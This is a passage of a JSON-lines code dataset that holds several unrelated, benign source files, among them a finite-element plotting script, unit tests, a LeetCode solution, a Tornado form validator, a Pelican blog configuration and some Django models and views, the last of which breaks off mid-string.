alpha=0.8)\n\nproblem.assemble()\n\nproblem.apply_essential_bc(floor,np.zeros(len(floor)),dof=\"y\")\n\n#problem.apply_essential_bc(floor,np.ones(len(floor))*100,dof=\"p\")\nproblem.apply_essential_bc(left,np.zeros(len(left)),dof=\"x\")\nproblem.apply_essential_bc(right,np.zeros(len(right)),dof=\"x\")\n\nproblem.apply_essential_bc(top,np.zeros(len(top)),dof=\"p\")\n#problem.apply_essential_bc(ns4,np.zeros(len(ns4)),dof=\"x\")\n\n#ns1 includes displacement nodes on the interior, we can't apply pressure\n#to these, so first we modify ns1 to include only pressure nodes\nns1_pres = np.intersect1d(ns1,connect[:,:4].flatten())\n#problem.apply_essential_bc(ns1_pres,5*np.ones(len(ns1_pres)),dof=\"p\")\n#Same for ns2\nns2_pres = np.intersect1d(ns2,connect[:,:4].flatten())\n#problem.apply_essential_bc(ns2_pres,500*6894*np.ones(len(ns2_pres)),dof=\"p\")\n\nx = problem.solve()\n\ndisplacement = x[problem.dof_map[:,:2].flatten()].reshape(-1,2)\ndeformed_pos = coords + displacement\n\npres_dof = problem.dof_map[:,-1][np.where(problem.dof_map[:,-1] != -1)]\npressure = x[pres_dof]\n\n\n################################################################################ \n# Plots\n\npatches = []\nfor coord in coords[connect[:,0:4]-1]:\n quad = Polygon(coord, facecolor='none', fill=False)\n patches.append(quad)\n\npres_idx, = np.where(problem.dof_map[:,-1] != -1)\nX = coords[pres_idx,0]\nY = coords[pres_idx,1]\ngrid_x, grid_y = np.mgrid[0:50:1000j, 0:-50:1000j]\np = scipy.interpolate.griddata((X, Y), pressure, (grid_x, grid_y), method='cubic')\n\nX = coords[:,0]\nY = coords[:,1]\nu_x = scipy.interpolate.griddata((X, Y), displacement[:,0], (grid_x, grid_y), method='cubic')\nu_y = scipy.interpolate.griddata((X, Y), displacement[:,1], (grid_x, grid_y), method='cubic')\ndisplacement_mag = np.sqrt(displacement[:,0] * displacement[:,0] + displacement[:,1] * displacement[:,1])\ndisp_mag = scipy.interpolate.griddata((X, Y), displacement_mag, (grid_x, grid_y), method='cubic')\ninterior = np.sqrt((grid_x**2 / 0.8**2) + (grid_y**2 / 1**2)) < 1\np[interior] = np.nan\n\nfig, ax = plt.subplots()\ncs = ax.contourf(grid_x, grid_y, p, cmap=\"coolwarm\") #,levels=np.linspace(-2, 5, 50))\nfig.colorbar(cs, ax=ax);\n#colors = 100 * np.random.rand(len(patches))\n\n\np = PatchCollection(patches, match_original=True)\np.set_linewidth(0.1)\n \n#p.set_array(np.array(colors))\nax.add_collection(p)\nax.set_xlim([0, 50])\nax.set_ylim([-50,0])\nax.set_aspect('equal') \n# \n# #Sigma xx\n\n#stress = problem.compute_stress(displacement).reshape(-1,3)\n#x_gauss_pt, y_gauss_pt = problem.compute_gauss_point_locations(deformed_pos)\n\n\n#stress_x = scipy.interpolate.griddata((x_gauss_pt, y_gauss_pt), stress[:,0], (grid_x, grid_y), method='cubic')\n#stress_y = scipy.interpolate.griddata((x_gauss_pt, y_gauss_pt), stress[:,1], (grid_x, grid_y), method='cubic')\n#stress_xy = scipy.interpolate.griddata((x_gauss_pt, y_gauss_pt), stress[:,2], (grid_x, grid_y), method='cubic')\n##stress_x[interior] = np.nan\n##stress_y[interior] = np.nan\n##stress_xy[interior] = np.nan\n\n\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, stress_x, cmap=\"coolwarm\",levels=np.linspace(-1, 2, 50))\n#plt.colorbar();\n#plt.title(\"$\\sigma_{xx}$\");\n\n\n# Sigma yy\n\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, stress_y, cmap=\"coolwarm\",levels=np.linspace(-1, 2, 50))\n#plt.colorbar();\n#plt.title(\"$\\sigma_{yy}$\");\n\n### Sigma xy\n\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, stress_xy, cmap=\"coolwarm\",levels=np.linspace(-1, 1, 50))\n#plt.colorbar();\n#plt.title(\"$\\sigma_{xy}$\");\n# \n# \n## X Disp\n\n#X = coords[:,0]\n#Y = coords[:,1]\n#disp_x = scipy.interpolate.griddata((X, Y), displacement[:,0], (grid_x, grid_y), method='cubic')\n##disp_x[interior] = np.nan\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, disp_x, cmap=\"coolwarm\")\n#plt.colorbar();\n#plt.title(\"X displacement\");\n\n## Y Disp\n\n#disp_y = scipy.interpolate.griddata((X, Y), displacement[:,1], (grid_x, grid_y), method='cubic')\n##disp_y[interior] = np.nan\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, disp_y, cmap=\"coolwarm\")\n#plt.colorbar();\n#plt.title(\"Y displacement\");\n\n## Disp Magnitude\n\n#displacement_mag = np.sqrt(displacement[:,0] * displacement[:,0] + displacement[:,1] * displacement[:,1])\n#disp_mag = scipy.interpolate.griddata((X, Y), displacement_mag, (grid_x, grid_y), method='cubic')\n##disp_mag[interior] = np.nan\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, disp_mag, cmap=\"coolwarm\")#,levels=np.linspace(0.0, 0.06, 50))\n#plt.colorbar();\n#plt.title(\"Displacement Magnitude\"); \n","sub_path":"src/test/2DCoupledFE.py","file_name":"2DCoupledFE.py","file_ext":"py","file_size_in_byte":23136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"86976682","text":"class Person:\n def __init__(self, name, birth_year, gender, mother=None, father=None):\n self.name = name\n self.birth_year = birth_year\n self.gender = gender\n self.kids = []\n self.mother = mother\n self.father = father\n\n if self.mother:\n self.mother.kids.append(self)\n\n if self.father:\n self.father.kids.append(self)\n\n def children(self, **kwargs):\n if kwargs:\n child = []\n for x in self.kids:\n if x.gender == kwargs['gender']:\n child.append(x)\n return child\n\n else:\n return self.kids\n\n def get_brothers(self):\n return list(self.all_siblings(gender='M'))\n\n def get_sisters(self):\n return list(self.all_siblings(gender='F'))\n\n def is_direct_successor(self, successor):\n\n if successor in self.kids:\n return True\n\n def all_siblings(self, gender):\n all_kids = set(self.mother.children() + self.father.children())\n siblings = set(sibling for sibling in all_kids\n if sibling is not self and sibling.gender == gender)\n\n return siblings\n\n","sub_path":"task3/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"110160674","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport oneflow as flow\nimport unittest\nimport numpy as np\n\n\n@unittest.skipIf(\n not flow.unittest.env.eager_execution_enabled(),\n \".numpy() doesn't work in lazy mode\",\n)\nclass TestMathModule(flow.unittest.TestCase):\n def test_sin(test_case):\n input = flow.Tensor(np.random.randn(2, 6, 5, 3), dtype=flow.float32)\n of_out = flow.sin(input)\n np_out = np.sin(input.numpy())\n test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 1e-5, 1e-5))\n test_case.assertTrue(np.allclose(input.sin().numpy(), np_out, 1e-5, 1e-5))\n\n arr = np.array([-0.5461, 0.1347, -2.7266, -0.2746])\n input2 = flow.Tensor(arr, dtype=flow.float32)\n np_out2 = np.array([-0.51935846, 0.13429303, -0.40318328, -0.27116194])\n of_out2 = flow.sin(input2)\n test_case.assertTrue(np.allclose(of_out2.numpy(), np_out2, 1e-5, 1e-5))\n\n def test_cos(test_case):\n input = flow.Tensor(np.random.randn(1, 3, 6), dtype=flow.float32)\n of_out = flow.cos(input)\n np_out = np.cos(input.numpy())\n test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 1e-5, 1e-5))\n test_case.assertTrue(np.allclose(input.cos().numpy(), np_out, 1e-5, 1e-5))\n\n arr = np.array([1.4309, 1.2706, -0.8562, 0.9796])\n input2 = flow.Tensor(arr, dtype=flow.float32)\n np_out2 = np.array([0.13944048, 0.29570782, 0.6553126, 0.5573547])\n of_out2 = flow.cos(input2)\n test_case.assertTrue(np.allclose(of_out2.numpy(), np_out2))\n\n def test_log(test_case):\n input = flow.Tensor(np.random.randn(2, 3, 4, 5), dtype=flow.float32)\n of_out = flow.log(input)\n np_out = np.log(input.numpy())\n test_case.assertTrue(\n np.allclose(of_out.numpy(), np_out, 1e-5, 1e-5, equal_nan=True)\n )\n test_case.assertTrue(np.allclose(input.log().numpy(), np_out, equal_nan=True))\n\n arr = np.array([-0.7168, -0.5471, -0.8933, -1.4428, -0.1190])\n input2 = flow.Tensor(arr, dtype=flow.float32)\n np_out = np.full((5,), np.nan)\n of_out2 = flow.log(input2)\n test_case.assertTrue(\n np.allclose(of_out2.numpy(), np_out, 1e-5, 1e-5, equal_nan=True)\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"oneflow/python/test/modules/test_math_ops.py","file_name":"test_math_ops.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"158552900","text":"\"\"\"\n84. Largest Rectangle in Histogram\n\nGiven n non-negative integers representing the histogram's bar height where the width of each bar is 1, find the area of largest rectangle in the histogram.\n\nAbove is a histogram where width of each bar is 1, given height = [2,1,5,6,2,3].\n\nThe largest rectangle is shown in the shaded area, which has area = 10 unit.\n\nExample:\n\nInput: [2,1,5,6,2,3]\nOutput: 10\n\nExpected Results:\n\n0. Test Case : {'expected': 10, 'heights': [2, 1, 5, 6, 2, 3]}\n - Result 1 : 10\n - Result 2 : 10\n - Assert : True\n\n1. Test Case : {'expected': 4, 'heights': [2, 1, 4]}\n - Result 1 : 4\n - Result 2 : 4\n - Assert : True\n\n2. Test Case : {'expected': 2, 'heights': [2]}\n - Result 1 : 2\n - Result 2 : 2\n - Assert : True\n\n3. Test Case : {'expected': 0, 'heights': []}\n - Result 1 : 0\n - Result 2 : 0\n - Assert : True\n\n\"\"\"\n\nfrom copy import deepcopy\n\nclass Solution:\n\n def largestRectangleArea1(self, heights):\n res, stk, i = 0, [], 0\n heights.append(0)\n\n while i < len(heights):\n if len(stk) == 0 or heights[stk[-1]] <= heights[i]:\n stk.append(i)\n i += 1\n else:\n past_idx = stk.pop()\n h = heights[past_idx]\n w = i\n if stk: w = i - stk[-1] - 1\n res = max(res, h*w)\n return res\n \n def largestRectangleArea2(self, heights):\n res, stk, heights = 0, [], [0] + heights + [0]\n for i in range(len(heights)):\n while stk and heights[stk[-1]] > heights[i]:\n j = stk.pop()\n res = max(res, (i-stk[-1]-1) * heights[j])\n stk.append(i)\n return res\n\n def test(self):\n test_cases = [\n { \"expected\": 10, \"heights\": [2,1,5,6,2,3] },\n { \"expected\": 4, \"heights\": [2,1,4] },\n { \"expected\": 2, \"heights\": [2] },\n { \"expected\": 0, \"heights\": [] }\n ]\n for i, test_case in enumerate(test_cases):\n heights, expected = test_case['heights'], test_case['expected']\n print(f\"\\n{i}. Test Case : {test_case}\")\n res1 = self.largestRectangleArea1(deepcopy(heights))\n res2 = self.largestRectangleArea2(deepcopy(heights))\n print(f\" - Result 1 : {res1}\")\n print(f\" - Result 2 : {res2}\")\n print(f\" - Assert : {expected == res1 == res2}\")\n\nif __name__ == '__main__':\n Solution().test()\n\n","sub_path":"mock/hard/stack/84_largest_rentangle_in_histogram.py","file_name":"84_largest_rentangle_in_histogram.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"197481070","text":"\n\n#calss header\nclass _LAWMAKER():\n\tdef __init__(self,): \n\t\tself.name = \"LAWMAKER\"\n\t\tself.definitions = [u'someone, such as a politician, who is responsible for making and changing laws']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_lawmaker.py","file_name":"_lawmaker.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"408827173","text":"# (C) Copyright 2004-2021 Enthought, Inc., Austin, TX\n# All rights reserved.\n#\n# This software is provided without warranty under the terms of the BSD\n# license included in LICENSE.txt and may be redistributed only under\n# the conditions described in the aforementioned license. The license\n# is also available online at http://www.enthought.com/licenses/BSD.txt\n#\n# Thanks for using Enthought open source!\n\n\"\"\" Trait definition for an RGB-based color, which is a tuple of the form\n (*red*, *green*, *blue*), where *red*, *green* and *blue* are floats in the\n range from 0.0 to 1.0.\n\"\"\"\n\n\nfrom traits.api import Trait, TraitError\nfrom traits.trait_base import SequenceTypes\n\nfrom traitsui.qt4.color_trait import standard_colors\n\n# -------------------------------------------------------------------------\n# Convert a number into an RGB tuple:\n# -------------------------------------------------------------------------\n\n\ndef range_check(value):\n \"\"\" Checks that *value* can be converted to a value in the range 0.0 to 1.0.\n\n If so, it returns the floating point value; otherwise, it raises a\n TraitError.\n \"\"\"\n value = float(value)\n if 0.0 <= value <= 1.0:\n return value\n raise TraitError\n\n\ndef convert_to_color(object, name, value):\n \"\"\" Converts a tuple or an integer to an RGB color value, or raises a\n TraitError if that is not possible.\n \"\"\"\n if isinstance(value, SequenceTypes) and len(value) == 3:\n return (\n range_check(value[0]),\n range_check(value[1]),\n range_check(value[2]),\n )\n if isinstance(value, int):\n return (\n (value / 0x10000) / 255.0,\n ((value // 0x100) & 0xFF) / 255.0,\n (value & 0xFF) / 255.0,\n )\n raise TraitError\n\n\nconvert_to_color.info = (\n \"a tuple of the form (r,g,b), where r, g, and b \"\n \"are floats in the range from 0.0 to 1.0, or an integer which in hex is of \"\n \"the form 0xRRGGBB, where RR is red, GG is green, and BB is blue\"\n)\n\n# -------------------------------------------------------------------------\n# Standard colors:\n# -------------------------------------------------------------------------\n\n# RGB versions of standard colors:\nrgb_standard_colors = {}\nfor name, color in standard_colors.items():\n rgb_standard_colors[name] = (color.redF(), color.greenF(), color.blueF())\n\n# -------------------------------------------------------------------------\n# Define wxPython specific color traits:\n# -------------------------------------------------------------------------\n\n### Note: Declare the editor to be a function which returns the RGBColorEditor\n# class from traits ui to avoid circular import issues. For backwards\n# compatibility with previous Traits versions, the 'editors' folder in Traits\n# project declares 'from api import *' in its __init__.py. The 'api' in turn\n# can contain classes that have a RGBColor trait which lead to this file getting\n# imported. This will lead to a circular import when declaring a RGBColor\n# trait.\n\n\ndef get_rgb_color_editor(*args, **traits):\n from .rgb_color_editor import ToolkitEditorFactory\n\n return ToolkitEditorFactory(*args, **traits)\n\n\n# Trait whose value must be an RGB color:\nRGBColor = Trait(\n \"white\", convert_to_color, rgb_standard_colors, editor=get_rgb_color_editor\n)\n","sub_path":"venv/lib/python3.8/site-packages/traitsui/qt4/rgb_color_trait.py","file_name":"rgb_color_trait.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"359549459","text":"import sqlite3\nfrom todos import TaskManager, Action_add\n\nconn = sqlite3.connect('ma_base.db')\n\ncursor = conn.cursor()\ncursor.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS taches(\n id INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,\n name TEXT,\n description TEXT,\n numero INTEGER,\n statut TEXT\n)\n\"\"\")\n\nconn.commit()\n\ncursor.execute(\"\"\"\nINSERT INTO taches(name, description, numero, statut) VALUES(?, ?, ?, ?)\"\"\", (\"add\", \"first task\", 1, \"à faire\"))\n\nconn.commit()\n\ncursor.execute(\"\"\"SELECT name, description, numero, statut FROM taches\"\"\")\nuser1 = cursor.fetchone()\nprint(user1)\n\nconn.commit()\n\nconn.close()","sub_path":"todos_final.py","file_name":"todos_final.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"632356535","text":"# -*- coding: utf-8 -*- #\nimport sys\nimport argparse\nimport re\nimport os\nimport random\nfrom collections import defaultdict\n\ndef get_args():\n parser = argparse.ArgumentParser(description = \"Mondat elemzes\")\n parser.add_argument(\"a_file\", type = str, help = \"file path\")\n parser.add_argument(\"b_file\", type = str, help = \"file path\")\n parser.add_argument(\"output\", type = str, help = \"file path\")\n return parser.parse_args()\n\ndef change(a_file, b_file, output):\n datas_sentence = []\n with open(a_file, \"r\", encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n if line == \"\\n\":\n continue\n if line.startswith(\"#\"):\n continue\n if line.startswith(\"Sum:\"):\n continue\n if line!=\"\\n\":\n field = line.split(\" \")\n sid = field[0]\n word1 = field[1]\n pos1 = field[2]\n word2 = field[3]\n pos2 = field[4]\n edge = field[5]\n\n data = {'sid': sid, 'word1' : word1, 'pos1' : pos1, 'word2': word2, 'pos2': pos2, 'edge': edge} \n datas_sentence.append(data)\n\n datas_sentence2 = []\n with open(b_file, \"r\", encoding='utf-8') as g:\n lines2 = g.readlines()\n for line2 in lines2:\n if line2 == \"\\n\":\n continue\n if line2.startswith(\"#\"):\n continue\n if line2.startswith(\"Sum:\"):\n continue\n if line2!=\"\\n\":\n fieldb = line2.split(\" \")\n sidb = fieldb[0]\n word1b = fieldb[1]\n pos1b = fieldb[2]\n word2b = fieldb[3]\n pos2b = fieldb[4]\n edgeb = fieldb[5]\n\n datab2 = {'sid': sidb, 'word1' : word1b, 'pos1' : pos1b, 'word2': word2b, 'pos2': pos2b, 'edge': edgeb} \n datas_sentence2.append(datab2)\n\n \n datas_compare= []\n for i in range(0, len(datas_sentence)):\n for j in range(0, len(datas_sentence2)):\n if ((datas_sentence[i]['sid'] == datas_sentence2[j]['sid']) and (datas_sentence[i]['word2'] == datas_sentence2[j]['word2'])) :\n datas_compare.append(datas_sentence[i]['sid'])\n datas_compare.append(' ')\n datas_compare.append(datas_sentence[i]['word1'])\n datas_compare.append(' ')\n datas_compare.append(datas_sentence[i]['word2'])\n datas_compare.append(' ')\n datas_compare.append(datas_sentence2[j]['word1'])\n datas_compare.append(' ')\n datas_compare.append(datas_sentence2[j]['word2'])\n datas_compare.append('\\n')\n \n\n \n with open(output, \"w\", encoding='utf-8') as z:\n for i in range(0, len(datas_compare)):\n for j in range(0, len(datas_compare[i])):\n #z.write ('Sum:', len(datas_compare))\n z.write(datas_compare[i][j])\n \n\ndef main():\n args = get_args()\n change(args.a_file, args.b_file, args.output)\n\nif __name__ == \"__main__\":\n main()","sub_path":"semantic parsing/code/filter_train_3input.py","file_name":"filter_train_3input.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284017269","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport tornado.ioloop\nimport tornado.web\nfrom hashlib import sha1\nimport os, time\nimport re\n\n\n# 创建form类\nclass MainForm(object):\n # 初始化\n def __init__(self):\n self.host = \"(.*)\"\n self.ip = \"^(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)(\\.(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)){3}$\"\n self.port = '(\\d+)'\n self.phone = '^1[3|4|5|8][0-9]\\d{8}$'\n\n # 验证\n def check_valid(self, request):\n # 循环当前类中的成员,注意此种方法\n\n flag = True\n value_dict = {}\n\n for key, regular in self.__dict__.items():\n '''\n 通过request.get_argument()来获取用户前端输入的值\n 在循环时,不需要关心前端输入值的个数,这里以自定义方法为主\n '''\n post_value = request.get_argument(key)\n # 前端提交的数据与自定义的正则表达式进行匹配验证\n ret = re.match(regular, post_value)\n print(key,\"---------\",ret, \"---------\",post_value)\n\n # 如果结果 结果为None时候,即只要有一项不匹配,就返回false,flag = False\n if not ret:\n flag = False\n # {\"ip\":192.168.1.1,\"port\":8080,....}\n value_dict[key] = post_value\n # print(value_dict)\n return flag,value_dict\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render('index.html')\n\n def post(self, *args, **kwargs):\n obj = MainForm()\n is_valid, value_dict= obj.check_valid(self)\n # self.write('ok')\n # 如果全部验证成功,则打印\n if is_valid:\n print(value_dict)\n self.write(\"ok\")\n\n\nsettings = {\n 'template_path': 'templates',\n 'static_path': 'statics',\n 'static_url_prefix': '/static/',\n 'cookie_secret': 'aiuasdhflashjdfoiuashdfiuh',\n 'login_url': '/login'\n}\n\napplication = tornado.web.Application([\n (r\"/index\", MainHandler),\n], **settings)\n\nif __name__ == \"__main__\":\n print(\"http://127.0.0.1:8888/index\")\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()\n\n\n## 不能区分是哪里错了\n","sub_path":"11tornado_form/form10.py","file_name":"form10.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"450792295","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'Jiheng Hu'\nSITENAME = \"Jiheng's Blog\"\nSITEURL = 'https://jihenghu.github.io'\n\nPATH ='content'\n\nTIMEZONE ='Asia/Shanghai'\n#DATE_FORMATS = {'zh':'%Y-%m-%d %H:%M'}\nDATE_FORMATS = {'en': '%a, %d %b %Y %H:%M'}\nTHEME ='pelican-elegant'\nDISQUS_SITENAME = 'jihenghu'\n\nCOMMENTS_INTRO = \"Disqus isn't stable due to poor network, email is highly recommended, `hjh18305@gmail.com`\"\nDEFAULT_LANG = 'zh'\n\n##### plugins \n## 插件目录\nPLUGIN_PATHS = [u\"pelican-plugins\"]\n#PLUGINS = [u\"neighbors\",u\"related_posts\",\"tag_cloud\",\"share_post\",\"sitemap\",\"tipue_search\",\"extract_toc\"]#,\"multi_part\"]\nPLUGINS = [u\"neighbors\",u\"related_posts\",\"tag_cloud\",\"share_post\",\"sitemap\",\"extract_toc\",\"series\"]#,\"multi_part\",\"tipue_search\"]\n\nUSE_SHORTCUT_ICONS = True\nSITELOGO = 'images/favicon.ico'\nFAVICON = 'images/favicon.ico'\nSITELOGO_SIZE = 15\n\n#MD_EXTENSIONS = ['codehilite(css_class=highlight)', 'extra', 'headerid', 'toc']\n# Markdown extensions to use...\n# The following line is deprecated for versions >= 3.7. However, I will leave this in here for backward compatibility for now (since some plugins have not been ported to 3.7.0).\n#MD_EXTENSIONS = ['fenced_code', 'codehilite(css_class=highlight, linenums=True)', 'toc', 'markdown.extensions.abbr', 'markdown.extensions.footnotes', 'markdown.extensions.tables', ]\n\n# For Pelican version >= 3.7 you will need the following...\nMARKDOWN = {\n 'extension_configs' : {\n 'markdown.extensions.codehilite' : {'css_class': 'highlight', 'linenums': True},\n 'markdown.extensions.abbr' : {},\n 'markdown.extensions.footnotes' : {},\n 'markdown.extensions.tables' : {},\n 'markdown.extensions.toc' : {'permalink': True},\n 'markdown.extensions.fenced_code' : {}\n }\n}\n\n\nDIRECT_TEMPLATES = (('index', 'tags', 'categories','archives', 'search', '404'))\n\nSITESUBTITLE = 'Glory Glory Man. United'\n\nMAILCHIMP_FORM_ACTION = 'https://facebook.us17.list-manage.com/subscribe/post?u=c5b98e725c643897fdbd8e8c3&id=248afa8728'\n\n## 配置sitemap 插件\nSITEMAP = {\n \"format\": \"xml\",\n \"priorities\": {\n \"articles\": 0.7,\n \"indexes\": 0.5,\n \"pages\": 0.3,\n },\n \"changefreqs\": {\n \"articles\": \"monthly\",\n \"indexes\": \"daily\",\n \"pages\": \"monthly\",\n }\n}\n## 设置URL按照日期显示\n#ARTICLE_URL = 'categories/{slug}.html'\n#ARTICLE_SAVE_AS = ARTICLE_URL\n\n## 分页\nDEFAULT_PAGINATION = 10\n\n## 静态目录设置\nSTATIC_PATHS = [\"images\",\"pdfs\"]\n\n## 顶部菜单项\n#MENUITEMS = [('archives',SITEURL+'/archives.html'),]\n\nUSE_FOLDER_AS_CATEGORY = True\n\nARTICLE_URL = '{category}/{slug}.html'\nARTICLE_SAVE_AS = ARTICLE_URL\nPAGE_URL = '{slug}.html'\nPAGE_SAVE_AS = PAGE_URL\n\nCATEGORY_URL = 'categories/{slug}.html'\nCATEGORY_SAVE_AS = CATEGORY_URL\nCATEGORIES_SAVE_AS = 'categories.html'\n\nTAG_URL = 'tags/{slug}.html'\nTAG_SAVE_AS = TAG_URL\nTAGS_SAVE_AS = 'tags.html' \n\n\n\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('GitHub', 'https://github.com/jihenghu'),\n ('YouTube', 'https://www.youtube.com/channel/UCPInVfFat-LA865PCIsgrcA?view_as=subscriber'),\n ('Instagram', 'https://www.instagram.com/jihenghu/'),\n ('Twitter', 'https://twitter.com/hjh18305'),\n ('FaceBook', 'https://www.facebook.com/profile.php?id=100010229477330'),)\n\n#SITE_DESCRIPTION = 'I built this static site just for daily record'\nGOOGLE_PLUS_PROFILE_URL = 'https://plus.google.com/u/0/105611375860140618313'\nTWITTER_USERNAME = 'hjh18305'\n\n\nLANDING_PAGE_ABOUT = {'title':'The leading page',\n 'details': 'My name is Jiheng Hu. I am [jihenghu](https://github.com/jihenghu/) at Github,you can reach me via hjh18305@gmail.com .
'\n '\\n I am a graduate student of University of Science & Technology of China, school of earth and space science.
'\n '\\n This is a static website built powered by Pelican'}\nPROJECTS = [{\n 'name': 'Build pelican blog',\n 'url': 'https://github.com/jihenghu/jihenghu.github.io',\n 'description': 'Build my own static blog'},\n {'name': 'MLSE retrieval',\n 'url': '#',\n 'description': 'Develop new algorithm to retrieval land surface emissivities'},\n\t{'name': 'Django Blog',\n 'url': 'https://github.com/jihenghu/django-blog',\n 'description': 'My Django project'},\n\t{'name': 'Book System',\n 'url': 'https://github.com/jihenghu/booksystem',\n 'description': 'Java Web Project built with Spring Boot+Mybatis'}\n\t]\n\n\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"49596344","text":"from django.contrib.postgres.fields import ArrayField, JSONField\nfrom django.db import models\nfrom django.template.defaultfilters import slugify\n\nfrom geo.models import CensusGeography\nfrom indicators.helpers import clean_sql\n\n\nclass MiniMap(models.Model):\n LAYER_TYPES = (\n ('background', 'background'),\n ('fill', 'fill'),\n ('line', 'line'),\n ('symbol', 'symbol'),\n ('raster', 'raster'),\n ('circle', 'circle'),\n ('fill - extrusion', 'fill - extrusion'),\n ('heatmap', 'heatmap'),\n ('hillshade', 'hillshade')\n )\n\n name = models.CharField(max_length=100)\n layer_type = models.CharField(max_length=16, choices=LAYER_TYPES, default='line')\n carto_table = models.CharField(max_length=80)\n fields = ArrayField(models.CharField(max_length=80), blank=True)\n geom_field = models.CharField(max_length=40, default=\"the_geom\")\n paint = JSONField(null=True, blank=True)\n layout = JSONField(null=True, blank=True)\n indicator = models.ForeignKey('Indicator', related_name='minimaps', on_delete=models.CASCADE)\n filter = models.TextField(null=True, blank=True)\n\n @property\n def slug(self):\n return slugify(self.name)\n\n @property\n def unfiltered_sql(self):\n return f\"SELECT {self.fields.join(', ')} FROM {self.carto_table}\"\n\n def get_sql_for_region(self, region: CensusGeography) -> str:\n sql = f\"\"\"\n SELECT {', '.join(self.fields)} , {self.geom_field}, the_geom_webmercator\n FROM {self.carto_table}\n WHERE ST_Intersects({self.geom_field}, ({region.carto_geom_sql}))\n \"\"\"\n if self.filter:\n sql += f\"\"\" AND {self.filter}\"\"\"\n\n return clean_sql(sql)\n\n def __str__(self):\n return self.name\n","sub_path":"indicators/models/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"391116558","text":"from django.shortcuts import render, redirect\n\nfrom .models import University, Department, Faculty\nfrom .forms import UniversityForm, DepartmentForm, FacultyForm, FeedbackForm\n\n# Create your views here.\ndef index(request):\n \"\"\"The home page for RMP BD\"\"\"\n return render(request, 'rmp_bd_app/index.html')\n\ndef universities(request):\n \"\"\"The univeristy page for RMP BD\"\"\"\n universities = University.objects.order_by('date_added')\n context = {'universities': universities}\n return render(request, 'rmp_bd_app/universities.html', context)\n\ndef university(request, university_id):\n \"\"\"Shows each individual university \"\"\"\n university = University.objects.get(id=university_id)\n departments = university.department_set.order_by('-date_added')\n context = {'university' : university, 'departments' : departments}\n return render(request, 'rmp_bd_app/departments.html', context)\n\ndef faculty(request, department_id):\n \"\"\"Shows faculty members for a department\"\"\"\n department = Department.objects.get(id=department_id)\n faculties = department.faculty_set.order_by('-date_added')\n context = {'department': department, 'faculties': faculties}\n return render(request, 'rmp_bd_app/faculties.html', context)\n\ndef faculty_details(request, faculty_id):\n \"\"\"Shows the students' 